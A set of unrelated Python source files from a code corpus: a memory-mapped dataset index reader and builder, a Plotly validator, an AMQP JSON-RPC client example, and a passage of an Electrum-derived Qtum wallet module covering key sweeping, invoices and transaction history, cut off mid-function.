index.write(struct.pack('<QQ', len(self.data_offsets) - 1, len(self.sizes)))
write_longs(index, self.dim_offsets)
write_longs(index, self.data_offsets)
write_longs(index, self.sizes)
index.close()
def _warmup_mmap_file(path):
with open(path, 'rb') as stream:
while stream.read(100 * 1024 * 1024):
pass
class MMapIndexedDataset(torch.utils.data.Dataset):
class Index(object):
_HDR_MAGIC = b'MMIDIDX\x00\x00'
@classmethod
def writer(cls, path, dtype):
class _Writer(object):
def __enter__(self):
self._file = open(path, 'wb')
self._file.write(cls._HDR_MAGIC)
self._file.write(struct.pack('<Q', 1))
self._file.write(struct.pack('<B', code(dtype)))
return self
@staticmethod
def _get_pointers(sizes):
dtype_size = dtype().itemsize
address = 0
pointers = []
for size in sizes:
pointers.append(address)
address += size * dtype_size
return pointers
def write(self, sizes):
pointers = self._get_pointers(sizes)
self._file.write(struct.pack('<Q', len(sizes)))
sizes = np.array(sizes, dtype=np.int32)
self._file.write(sizes.tobytes(order='C'))
del sizes
pointers = np.array(pointers, dtype=np.int64)
self._file.write(pointers.tobytes(order='C'))
del pointers
def __exit__(self, exc_type, exc_val, exc_tb):
self._file.close()
return _Writer()
def __init__(self, path):
with open(path, 'rb') as stream:
magic_test = stream.read(9)
assert self._HDR_MAGIC == magic_test, (
'Index file doesn\'t match expected format. '
'Make sure that --dataset-impl is configured properly.'
)
version = struct.unpack('<Q', stream.read(8))
assert (1,) == version
dtype_code, = struct.unpack('<B', stream.read(1))
self._dtype = dtypes[dtype_code]
self._dtype_size = self._dtype().itemsize
self._len = struct.unpack('<Q', stream.read(8))[0]
offset = stream.tell()
_warmup_mmap_file(path)
self._bin_buffer_mmap = np.memmap(path, mode='r', order='C')
self._bin_buffer = memoryview(self._bin_buffer_mmap)
self._sizes = np.frombuffer(self._bin_buffer, dtype=np.int32, count=self._len, offset=offset)
self._pointers = np.frombuffer(self._bin_buffer, dtype=np.int64, count=self._len,
offset=offset + self._sizes.nbytes)
def __del__(self):
self._bin_buffer_mmap._mmap.close()
del self._bin_buffer_mmap
@property
def dtype(self):
return self._dtype
@property
def sizes(self):
return self._sizes
@lru_cache(maxsize=8)
def __getitem__(self, i):
return self._pointers[i], self._sizes[i]
def __len__(self):
return self._len
def __init__(self, path):
super().__init__()
self._path = None
self._index = None
self._bin_buffer = None
self._do_init(path)
def __getstate__(self):
return self._path
def __setstate__(self, state):
self._do_init(state)
def _do_init(self, path):
self._path = path
self._index = self.Index(index_file_path(self._path))
_warmup_mmap_file(data_file_path(self._path))
self._bin_buffer_mmap = np.memmap(data_file_path(self._path), mode='r', order='C')
self._bin_buffer = memoryview(self._bin_buffer_mmap)
def __del__(self):
self._bin_buffer_mmap._mmap.close()
del self._bin_buffer_mmap
del self._index
def __len__(self):
return len(self._index)
@lru_cache(maxsize=8)
def __getitem__(self, i):
ptr, size = self._index[i]
np_array = np.frombuffer(self._bin_buffer, dtype=self._index.dtype, count=size, offset=ptr)
if self._index.dtype != np.int64:
np_array = np_array.astype(np.int64)
return torch.from_numpy(np_array)
@property
def sizes(self):
return self._index.sizes
@property
def supports_prefetch(self):
return False
@staticmethod
def exists(path):
return (
os.path.exists(index_file_path(path)) and os.path.exists(data_file_path(path))
)
class MMapIndexedDatasetBuilder(object):
def __init__(self, out_file, dtype=np.int64):
self._data_file = open(out_file, 'wb')
self._dtype = dtype
self._sizes = []
def add_item(self, tensor):
np_array = np.array(tensor.numpy(), dtype=self._dtype)
self._data_file.write(np_array.tobytes(order='C'))
self._sizes.append(np_array.size)
def merge_file_(self, another_file):
# Concatenate index
index = MMapIndexedDataset.Index(index_file_path(another_file))
assert index.dtype == self._dtype
for size in index.sizes:
self._sizes.append(size)
# Concatenate data
with open(data_file_path(another_file), 'rb') as f:
shutil.copyfileobj(f, self._data_file)
def finalize(self, index_file):
self._data_file.close()
with MMapIndexedDataset.Index.writer(index_file, self._dtype) as index:
index.write(self._sizes)
|
the-stack_106_19064
|
import _plotly_utils.basevalidators
class FamilyValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(self, plotly_name="family", parent_name="pie.title.font", **kwargs):
super(FamilyValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "plot"),
no_blank=kwargs.pop("no_blank", True),
strict=kwargs.pop("strict", True),
**kwargs,
)
|
the-stack_106_19066
|
import asyncio
import pjrpc
from pjrpc.client.backend import aio_pika as pjrpc_client
async def main():
client = pjrpc_client.Client('amqp://guest:guest@localhost:5672/v1', 'jsonrpc')
await client.connect()
response: pjrpc.Response = await client.send(pjrpc.Request('sum', params=[1, 2], id=1))
print(f"1 + 2 = {response.result}")
result = await client('sum', a=1, b=2)
print(f"1 + 2 = {result}")
result = await client.proxy.sum(1, 2)
print(f"1 + 2 = {result}")
await client.notify('tick')
if __name__ == "__main__":
asyncio.run(main())
|
the-stack_106_19067
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - Imported_Wallet: imported addresses or single keys, 0 or 1 keystore
# - Standard_Wallet: one HD keystore, P2PKH-like scripts
# - Multisig_Wallet: several HD keystores, M-of-N OP_CHECKMULTISIG scripts
import os
import sys
import random
import time
import json
import copy
import errno
import traceback
import operator
import binascii
from functools import partial
from collections import defaultdict
from numbers import Number
from decimal import Decimal
from typing import TYPE_CHECKING, List, Optional, Tuple, Union, NamedTuple, Sequence, Dict, Any, Set
from abc import ABC, abstractmethod
import itertools
from .i18n import _
from .bip32 import BIP32Node
from .crypto import sha256
from .util import (NotEnoughFunds, UserCancelled, profiler,
format_satoshis, format_fee_satoshis, NoDynamicFeeEstimates,
WalletFileException, BitcoinException,
InvalidPassword, format_time, timestamp_to_datetime, Satoshis,
Fiat, bfh, bh2u, TxMinedInfo, quantize_feerate, create_bip21_uri, OrderedDictWithIndex)
from .util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from .simple_config import SimpleConfig
from .bitcoin import (COIN, TYPE_ADDRESS, TYPE_PUBKEY, is_address, address_to_script, serialize_privkey,
is_minikey, relayfee, dust_threshold, COINBASE_MATURITY, RECOMMEND_CONFIRMATIONS,
TOKEN_TRANSFER_TOPIC, b58_address_to_hash160, hash160_to_p2pkh)
from .crypto import sha256d
from . import keystore
from .keystore import load_keystore, Hardware_KeyStore, KeyStore, Mobile_KeyStore, Qt_Core_Keystore, KeyStoreWithMPK, AddressIndexGeneric
from .util import multisig_type
from .storage import StorageEncryptionVersion, WalletStorage
from . import transaction, bitcoin, coinchooser, paymentrequest, ecc, bip32
from .transaction import (Transaction, TxInput, UnknownTxinType, TxOutput,
PartialTransaction, PartialTxInput, PartialTxOutput, TxOutpoint)
from .plugin import run_hook
from .address_synchronizer import (AddressSynchronizer, TX_HEIGHT_LOCAL,
TX_HEIGHT_UNCONF_PARENT, TX_HEIGHT_UNCONFIRMED, TX_HEIGHT_FUTURE)
from .util import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT
from .contacts import Contacts
from .interface import NetworkException
from .ecc_fast import is_using_fast_ecc
from .mnemonic import Mnemonic
from .logging import get_logger
from .lnworker import LNWallet
from .paymentrequest import PaymentRequest
if TYPE_CHECKING:
from .network import Network
_logger = get_logger(__name__)
TX_STATUS = [
_('Unconfirmed'),
_('Unconfirmed parent'),
_('Not Verified'),
_('Local'),
]
def _append_utxos_to_inputs(inputs: List[PartialTxInput], network: 'Network', pubkey, txin_type, imax):
if txin_type in ('p2pkh', 'p2wpkh', 'p2wpkh-p2sh'):
address = bitcoin.pubkey_to_address(txin_type, pubkey)
scripthash = bitcoin.address_to_scripthash(address)
elif txin_type == 'p2pk':
script = bitcoin.public_key_to_p2pk_script(pubkey)
scripthash = bitcoin.script_to_scripthash(script)
address = None
else:
raise Exception(f'unexpected txin_type to sweep: {txin_type}')
u = network.run_from_another_thread(network.listunspent_for_scripthash(scripthash))
for item in u:
if len(inputs) >= imax:
break
prevout_str = item['tx_hash'] + ':%d' % item['tx_pos']
prevout = TxOutpoint.from_str(prevout_str)
utxo = PartialTxInput(prevout=prevout)
utxo._trusted_value_sats = int(item['value'])
utxo._trusted_address = address
utxo.block_height = int(item['height'])
utxo.script_type = txin_type
utxo.pubkeys = [bfh(pubkey)]
utxo.num_sig = 1
if txin_type == 'p2wpkh-p2sh':
utxo.redeem_script = bfh(bitcoin.p2wpkh_nested_script(pubkey))
inputs.append(utxo)
def sweep_preparations(privkeys, network: 'Network', imax=100):
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = ecc.ECPrivkey(privkey).get_public_key_hex(compressed=compressed)
_append_utxos_to_inputs(inputs, network, pubkey, txin_type, imax)
keypairs[pubkey] = privkey, compressed
inputs = [] # type: List[PartialTxInput]
keypairs = {}
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
if not inputs:
raise Exception(_('No inputs found. (Note that inputs need to be confirmed)'))
# FIXME actually inputs need not be confirmed now, see https://github.com/kyuupichan/electrumx/issues/365
return inputs, keypairs
def sweep(privkeys, *, network: 'Network', config: 'SimpleConfig',
to_address: str, fee: int = None, imax=100,
locktime=None, tx_version=None) -> PartialTransaction:
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(txin.value_sats() for txin in inputs)
if fee is None:
outputs = [PartialTxOutput(scriptpubkey=bfh(bitcoin.address_to_script(to_address)),
value=total)]
tx = PartialTransaction.from_io(inputs, outputs)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise Exception(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise Exception(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [PartialTxOutput(scriptpubkey=bfh(bitcoin.address_to_script(to_address)),
value=total - fee)]
if locktime is None:
locktime = get_locktime_for_new_transaction(network)
tx = PartialTransaction.from_io(inputs, outputs, locktime=locktime, version=tx_version)
tx.set_rbf(True)
tx.sign(keypairs)
return tx
def get_locktime_for_new_transaction(network: 'Network') -> int:
# if no network or not up to date, just set locktime to zero
if not network:
return 0
chain = network.blockchain()
header = chain.header_at_tip()
if not header:
return 0
STALE_DELAY = 8 * 60 * 60 # in seconds
if header['timestamp'] + STALE_DELAY < time.time():
return 0
# discourage "fee sniping"
locktime = chain.height()
# sometimes pick locktime a bit further back, to help privacy
# of setups that need more time (offline/multisig/coinjoin/...)
if random.randint(0, 9) == 0:
locktime = max(0, locktime - random.randint(0, 99))
return locktime
class CannotBumpFee(Exception): pass
class InternalAddressCorruption(Exception):
def __str__(self):
return _("Wallet file corruption detected. "
"Please restore your wallet from seed, and compare the addresses in both files")
class TxWalletDetails(NamedTuple):
txid: Optional[str]
status: str
label: str
can_broadcast: bool
can_bump: bool
can_save_as_local: bool
amount: Optional[int]
fee: Optional[int]
tx_mined_status: TxMinedInfo
mempool_depth_bytes: Optional[int]
class Abstract_Wallet(AddressSynchronizer, ABC):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
LOGGING_SHORTCUT = 'w'
max_change_outputs = 3
gap_limit_for_change = 6
txin_type: str
wallet_type: str
def __init__(self, storage: WalletStorage, *, config: SimpleConfig):
if not storage.is_ready_to_be_used_by_wallet():
raise Exception("storage not ready to be used by Abstract_Wallet")
self.config = config
assert self.config is not None, "config must not be None"
self.storage = storage
# load addresses needs to be called before constructor for sanity checks
self.storage.db.load_addresses(self.wallet_type)
self.keystore = None # type: Optional[KeyStore] # will be set by load_keystore
AddressSynchronizer.__init__(self, storage.db)
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
self.frozen_addresses = set(storage.get('frozen_addresses', []))
self.frozen_coins = set(storage.get('frozen_coins', [])) # set of txid:vout strings
self.fiat_value = storage.get('fiat_value', {})
self.receive_requests = storage.get('payment_requests', {})
self.invoices = storage.get('invoices', {})
# convert invoices
# TODO invoices being these contextual dicts even internally,
# where certain keys are only present depending on values of other keys...
# it's horrible. we need to change this, at least for the internal representation,
# to something that can be typed.
for invoice_key, invoice in self.invoices.items():
if invoice.get('type') == PR_TYPE_ONCHAIN:
outputs = [PartialTxOutput.from_legacy_tuple(*output) for output in invoice.get('outputs')]
invoice['outputs'] = outputs
self._prepare_onchain_invoice_paid_detection()
self.calc_unused_change_addresses()
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
self.contacts = Contacts(self.storage)
self._coin_price_cache = {}
# lightning
ln_xprv = self.storage.get('lightning_privkey2')
self.lnworker = LNWallet(self, ln_xprv) if ln_xprv else None
def has_lightning(self):
return bool(self.lnworker)
def init_lightning(self):
if self.storage.get('lightning_privkey2'):
return
if not is_using_fast_ecc():
raise Exception('libsecp256k1 library not available. '
'Verifying Lightning channels is too computationally expensive without libsecp256k1, aborting.')
# TODO derive this deterministically from wallet.keystore at keystore generation time
# probably along a hardened path ( lnd-equivalent would be m/1017'/coinType'/ )
seed = os.urandom(32)
node = BIP32Node.from_rootseed(seed, xtype='standard')
ln_xprv = node.to_xprv()
self.storage.put('lightning_privkey2', ln_xprv)
self.storage.write()
def remove_lightning(self):
if not self.storage.get('lightning_privkey2'):
return
if bool(self.lnworker.channels):
raise Exception('Error: This wallet has channels')
self.storage.put('lightning_privkey2', None)
self.storage.write()
def stop_threads(self):
super().stop_threads()
if any([ks.is_requesting_to_be_rewritten_to_wallet_file for ks in self.get_keystores()]):
self.save_keystore()
self.storage.write()
def set_up_to_date(self, b):
super().set_up_to_date(b)
if b: self.storage.write()
def clear_history(self):
super().clear_history()
self.storage.write()
def start_network(self, network):
AddressSynchronizer.start_network(self, network)
if self.lnworker:
network.maybe_init_lightning()
self.lnworker.start_network(network)
def load_and_cleanup(self):
self.load_keystore()
self.test_addresses_sanity()
super().load_and_cleanup()
@abstractmethod
def load_keystore(self) -> None:
pass
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def get_master_public_keys(self):
return []
def basename(self) -> str:
return self.storage.basename()
def test_addresses_sanity(self) -> None:
addrs = self.get_receiving_addresses()
if len(addrs) > 0:
addr = str(addrs[0])
if not bitcoin.is_address(addr):
neutered_addr = addr[:5] + '..' + addr[-2:]
raise WalletFileException(f'The addresses in this wallet are not Qtum addresses.\n'
f'e.g. {neutered_addr} (length: {len(addr)})')
def calc_unused_change_addresses(self):
with self.lock:
if hasattr(self, '_unused_change_addresses'):
addrs = self._unused_change_addresses
else:
addrs = self.get_change_addresses()
self._unused_change_addresses = [addr for addr in addrs if not self.is_used(addr)]
return list(self._unused_change_addresses)
def is_deterministic(self) -> bool:
return self.keystore.is_deterministic()
def set_label(self, name: str, text: str = None) -> bool:
if not name:
return False
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text is not None:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def set_fiat_value(self, txid, ccy, text, fx, value_sat):
if not self.db.get_transaction(txid):
return
# since fx is inserting the thousands separator,
# and not util, also have fx remove it
text = fx.remove_thousands_separator(text)
def_fiat = self.default_fiat_value(txid, fx, value_sat)
formatted = fx.ccy_amount_str(def_fiat, commas=False)
def_fiat_rounded = Decimal(formatted)
reset = not text
if not reset:
try:
text_dec = Decimal(text)
text_dec_rounded = Decimal(fx.ccy_amount_str(text_dec, commas=False))
reset = text_dec_rounded == def_fiat_rounded
except:
# garbage. not resetting, but not saving either
return False
if reset:
d = self.fiat_value.get(ccy, {})
if d and txid in d:
d.pop(txid)
else:
# avoid saving empty dict
return True
else:
if ccy not in self.fiat_value:
self.fiat_value[ccy] = {}
self.fiat_value[ccy][txid] = text
self.storage.put('fiat_value', self.fiat_value)
return reset
def get_fiat_value(self, txid, ccy):
fiat_value = self.fiat_value.get(ccy, {}).get(txid)
try:
return Decimal(fiat_value)
except:
return
def is_mine(self, address) -> bool:
return bool(self.get_address_index(address))
def is_change(self, address) -> bool:
if not self.is_mine(address):
return False
return self.get_address_index(address)[0] == 1
@abstractmethod
def get_address_index(self, address: str) -> Optional[AddressIndexGeneric]:
pass
@abstractmethod
def get_redeem_script(self, address: str) -> Optional[str]:
pass
@abstractmethod
def get_witness_script(self, address: str) -> Optional[str]:
pass
@abstractmethod
def get_txin_type(self, address: str) -> str:
"""Return script type of wallet address."""
pass
def export_private_key(self, address, password) -> str:
if self.is_watching_only():
raise Exception(_("This is a watching-only wallet"))
if not is_address(address):
raise Exception(f"Invalid qtum address: {address}")
if not self.is_mine(address):
raise Exception(_('Address not in wallet.') + f' {address}')
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
txin_type = self.get_txin_type(address)
serialized_privkey = bitcoin.serialize_privkey(pk, compressed, txin_type)
return serialized_privkey
@abstractmethod
def get_public_keys(self, address: str) -> Sequence[str]:
pass
def get_public_keys_with_deriv_info(self, address: str) -> Dict[bytes, Tuple[KeyStoreWithMPK, Sequence[int]]]:
"""Returns a map: pubkey -> (keystore, derivation_suffix)"""
return {}
def get_tx_info(self, tx) -> TxWalletDetails:
is_relevant, is_mine, v, fee = self.get_wallet_delta(tx)
if fee is None and isinstance(tx, PartialTransaction):
fee = tx.get_fee()
exp_n = None
can_broadcast = False
can_bump = False
tx_hash = tx.txid()
tx_we_already_have_in_db = self.db.get_transaction(tx_hash)
can_save_as_local = (is_relevant and tx.txid() is not None
and (tx_we_already_have_in_db is None or not tx_we_already_have_in_db.is_complete()))
label = ''
tx_mined_status = self.get_tx_height(tx_hash)
if tx.is_complete():
if tx_we_already_have_in_db:
label = self.get_label(tx_hash)
if tx_mined_status.height > 0:
if tx_mined_status.conf:
status = _("{} confirmations").format(tx_mined_status.conf)
else:
status = _('Not verified')
elif tx_mined_status.height in (TX_HEIGHT_UNCONF_PARENT, TX_HEIGHT_UNCONFIRMED):
status = _('Unconfirmed')
if fee is None:
fee = self.get_tx_fee(tx_hash)
if fee and self.network and self.config.has_fee_mempool():
size = tx.estimated_size()
fee_per_byte = fee / size
exp_n = self.config.fee_to_depth(fee_per_byte)
can_bump = is_mine and not tx.is_final()
else:
status = _('Local')
can_broadcast = self.network is not None
can_bump = is_mine and not tx.is_final()
else:
status = _("Signed")
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
status = _("Unsigned") if s == 0 else _('Partially signed') + ' (%d/%d)'%(s,r)
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
return TxWalletDetails(
txid=tx_hash,
status=status,
label=label,
can_broadcast=can_broadcast,
can_bump=can_bump,
can_save_as_local=can_save_as_local,
amount=amount,
fee=fee,
tx_mined_status=tx_mined_status,
mempool_depth_bytes=exp_n,
)
def get_spendable_coins(self, domain, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
confirmed_only = self.config.get('confirmed_only', False)
utxos = self.get_utxos(domain,
excluded_addresses=self.frozen_addresses,
mature_only=True,
confirmed_only=confirmed_only,
nonlocal_only=nonlocal_only)
utxos = [utxo for utxo in utxos if not self.is_frozen_coin(utxo)]
return utxos
@abstractmethod
def get_receiving_addresses(self, *, slice_start=None, slice_stop=None) -> Sequence[str]:
pass
@abstractmethod
def get_change_addresses(self, *, slice_start=None, slice_stop=None) -> Sequence[str]:
pass
def dummy_address(self):
# first receiving address
return self.get_receiving_addresses(slice_start=0, slice_stop=1)[0]
def get_addresses_sort_by_balance(self):
addrs = []
for addr in self.get_addresses():
c, u, x = self.get_addr_balance(addr)
addrs.append((addr, c + u))
return list([addr[0] for addr in sorted(addrs, key=lambda y: (-int(y[1]), y[0]))])
def get_spendable_addresses(self, min_amount=0.000000001):
result = []
for addr in self.get_addresses():
c, u, x = self.get_addr_balance(addr)
if c >= min_amount:
result.append(addr)
return result
def get_frozen_balance(self):
if not self.frozen_coins: # shortcut
return self.get_balance(self.frozen_addresses)
c1, u1, x1 = self.get_balance()
c2, u2, x2 = self.get_balance(excluded_addresses=self.frozen_addresses,
excluded_coins=self.frozen_coins)
return c1-c2, u1-u2, x1-x2
def balance_at_timestamp(self, domain, target_timestamp):
# we assume that get_history returns items ordered by block height
# we also assume that block timestamps are monotonic (which is false...!)
h = self.get_history(domain=domain)
balance = 0
for hist_item in h:
balance = hist_item.balance
if hist_item.tx_mined_status.timestamp is None or hist_item.tx_mined_status.timestamp > target_timestamp:
return balance - hist_item.delta
# return last balance
return balance
def get_onchain_history(self, *, domain=None):
for hist_item in self.get_history(domain=domain):
yield {
'txid': hist_item.txid,
'fee_sat': hist_item.fee,
'height': hist_item.tx_mined_status.height,
'confirmations': hist_item.tx_mined_status.conf,
'timestamp': hist_item.tx_mined_status.timestamp,
'incoming': True if hist_item.delta>0 else False,
'bc_value': Satoshis(hist_item.delta),
'bc_balance': Satoshis(hist_item.balance),
'date': timestamp_to_datetime(hist_item.tx_mined_status.timestamp),
'label': self.get_label(hist_item.txid),
'txpos_in_block': hist_item.tx_mined_status.txpos,
}
def create_invoice(self, outputs: List[PartialTxOutput], message, pr, URI):
if '!' in (x.value for x in outputs):
amount = '!'
else:
amount = sum(x.value for x in outputs)
invoice = {
'type': PR_TYPE_ONCHAIN,
'message': message,
'outputs': outputs,
'amount': amount,
}
if pr:
invoice['bip70'] = pr.raw.hex()
invoice['time'] = pr.get_time()
invoice['exp'] = pr.get_expiration_date() - pr.get_time()
invoice['requestor'] = pr.get_requestor()
invoice['message'] = pr.get_memo()
elif URI:
timestamp = URI.get('time')
if timestamp: invoice['time'] = timestamp
exp = URI.get('exp')
if exp: invoice['exp'] = exp
if 'time' not in invoice:
invoice['time'] = int(time.time())
return invoice
def save_invoice(self, invoice):
invoice_type = invoice['type']
if invoice_type == PR_TYPE_LN:
key = invoice['rhash']
elif invoice_type == PR_TYPE_ONCHAIN:
key = bh2u(sha256(repr(invoice))[0:16])
invoice['id'] = key
outputs = invoice['outputs'] # type: List[PartialTxOutput]
with self.transaction_lock:
for txout in outputs:
self._invoices_from_scriptpubkey_map[txout.scriptpubkey].add(key)
else:
raise Exception('Unsupported invoice type')
self.invoices[key] = invoice
self.storage.put('invoices', self.invoices)
self.storage.write()
def clear_invoices(self):
self.invoices = {}
self.storage.put('invoices', self.invoices)
self.storage.write()
def get_invoices(self):
out = [self.get_invoice(key) for key in self.invoices.keys()]
out = list(filter(None, out))
out.sort(key=operator.itemgetter('time'))
return out
def get_invoice(self, key):
if key not in self.invoices:
return
item = copy.copy(self.invoices[key])
request_type = item.get('type')
if request_type == PR_TYPE_ONCHAIN:
item['status'] = PR_PAID if self._is_onchain_invoice_paid(item)[0] else PR_UNPAID
elif self.lnworker and request_type == PR_TYPE_LN:
item['status'] = self.lnworker.get_payment_status(bfh(item['rhash']))
else:
return
return item
def _get_relevant_invoice_keys_for_tx(self, tx: Transaction) -> Set[str]:
relevant_invoice_keys = set()
for txout in tx.outputs():
for invoice_key in self._invoices_from_scriptpubkey_map.get(txout.scriptpubkey, set()):
relevant_invoice_keys.add(invoice_key)
return relevant_invoice_keys
def _prepare_onchain_invoice_paid_detection(self):
# scriptpubkey -> list(invoice_keys)
self._invoices_from_scriptpubkey_map = defaultdict(set) # type: Dict[bytes, Set[str]]
for invoice_key, invoice in self.invoices.items():
if invoice.get('type') == PR_TYPE_ONCHAIN:
outputs = invoice['outputs'] # type: List[PartialTxOutput]
for txout in outputs:
self._invoices_from_scriptpubkey_map[txout.scriptpubkey].add(invoice_key)
def _is_onchain_invoice_paid(self, invoice) -> Tuple[bool, Sequence[str]]:
"""Returns whether on-chain invoice is satisfied, and list of relevant TXIDs."""
assert invoice.get('type') == PR_TYPE_ONCHAIN
invoice_amounts = defaultdict(int) # type: Dict[bytes, int] # scriptpubkey -> value_sats
for txo in invoice['outputs']: # type: PartialTxOutput
invoice_amounts[txo.scriptpubkey] += 1 if txo.value == '!' else txo.value
relevant_txs = []
with self.transaction_lock:
for invoice_scriptpubkey, invoice_amt in invoice_amounts.items():
scripthash = bitcoin.script_to_scripthash(invoice_scriptpubkey.hex())
prevouts_and_values = self.db.get_prevouts_by_scripthash(scripthash)
relevant_txs += [prevout.txid.hex() for prevout, v in prevouts_and_values]
total_received = sum([v for prevout, v in prevouts_and_values])
# check that there is at least one TXO, and that they pay enough.
# note: "at least one TXO" check is needed for zero amount invoice (e.g. OP_RETURN)
if len(prevouts_and_values) == 0:
return False, []
if total_received < invoice_amt:
return False, []
return True, relevant_txs
def _maybe_set_tx_label_based_on_invoices(self, tx: Transaction) -> bool:
tx_hash = tx.txid()
with self.transaction_lock:
labels = []
for invoice_key in self._get_relevant_invoice_keys_for_tx(tx):
invoice = self.invoices.get(invoice_key)
if invoice is None: continue
assert invoice.get('type') == PR_TYPE_ONCHAIN
if invoice['message']:
labels.append(invoice['message'])
if labels:
self.set_label(tx_hash, "; ".join(labels))
return bool(labels)
def add_transaction(self, tx, *, allow_unrelated=False):
tx_was_added = super().add_transaction(tx, allow_unrelated=allow_unrelated)
if tx_was_added:
self._maybe_set_tx_label_based_on_invoices(tx)
return tx_was_added
@profiler
def get_full_history(self, fx=None, *, onchain_domain=None, include_lightning=True):
transactions = OrderedDictWithIndex()
onchain_history = self.get_onchain_history(domain=onchain_domain)
for tx_item in onchain_history:
txid = tx_item['txid']
transactions[txid] = tx_item
if self.lnworker and include_lightning:
lightning_history = self.lnworker.get_history()
else:
lightning_history = []
for i, tx_item in enumerate(lightning_history):
txid = tx_item.get('txid')
ln_value = Decimal(tx_item['amount_msat']) / 1000
if txid and txid in transactions:
item = transactions[txid]
item['label'] = tx_item['label']
item['ln_value'] = Satoshis(ln_value)
item['ln_balance_msat'] = tx_item['balance_msat']
else:
tx_item['lightning'] = True
tx_item['ln_value'] = Satoshis(ln_value)
tx_item['txpos'] = i # for sorting
key = tx_item['payment_hash'] if 'payment_hash' in tx_item else tx_item['type'] + tx_item['channel_id']
transactions[key] = tx_item
now = time.time()
balance = 0
for item in transactions.values():
# add on-chain and lightning values
value = Decimal(0)
if item.get('bc_value'):
value += item['bc_value'].value
if item.get('ln_value'):
value += item.get('ln_value').value
item['value'] = Satoshis(value)
balance += value
item['balance'] = Satoshis(balance)
if fx:
timestamp = item['timestamp'] or now
fiat_value = value / Decimal(bitcoin.COIN) * fx.timestamp_rate(timestamp)
item['fiat_value'] = Fiat(fiat_value, fx.ccy)
item['fiat_default'] = True
return transactions
@profiler
def get_detailed_history(self, from_timestamp=None, to_timestamp=None,
fx=None, show_addresses=False):
# History with capital gains, using utxo pricing
# FIXME: Lightning capital gains would requires FIFO
out = []
income = 0
expenditures = 0
capital_gains = Decimal(0)
fiat_income = Decimal(0)
fiat_expenditures = Decimal(0)
now = time.time()
for item in self.get_onchain_history():
timestamp = item['timestamp']
if from_timestamp and (timestamp or now) < from_timestamp:
continue
if to_timestamp and (timestamp or now) >= to_timestamp:
continue
tx_hash = item['txid']
tx = self.db.get_transaction(tx_hash)
tx_fee = item['fee_sat']
item['fee'] = Satoshis(tx_fee) if tx_fee is not None else None
if show_addresses:
item['inputs'] = list(map(lambda x: x.to_json(), tx.inputs()))
item['outputs'] = list(map(lambda x: {'address': x.get_ui_address_str(), 'value': Satoshis(x.value)},
tx.outputs()))
# fixme: use in and out values
value = item['bc_value'].value
if value < 0:
expenditures += -value
else:
income += value
# fiat computations
if fx and fx.is_enabled() and fx.get_history_config():
fiat_fields = self.get_tx_item_fiat(tx_hash, value, fx, tx_fee)
fiat_value = fiat_fields['fiat_value'].value
item.update(fiat_fields)
if value < 0:
capital_gains += fiat_fields['capital_gain'].value
fiat_expenditures += -fiat_value
else:
fiat_income += fiat_value
out.append(item)
# add summary
if out:
b, v = out[0]['bc_balance'].value, out[0]['bc_value'].value
start_balance = None if b is None or v is None else b - v
end_balance = out[-1]['bc_balance'].value
if from_timestamp is not None and to_timestamp is not None:
start_date = timestamp_to_datetime(from_timestamp)
end_date = timestamp_to_datetime(to_timestamp)
else:
start_date = None
end_date = None
summary = {
'start_date': start_date,
'end_date': end_date,
'start_balance': Satoshis(start_balance),
'end_balance': Satoshis(end_balance),
'incoming': Satoshis(income),
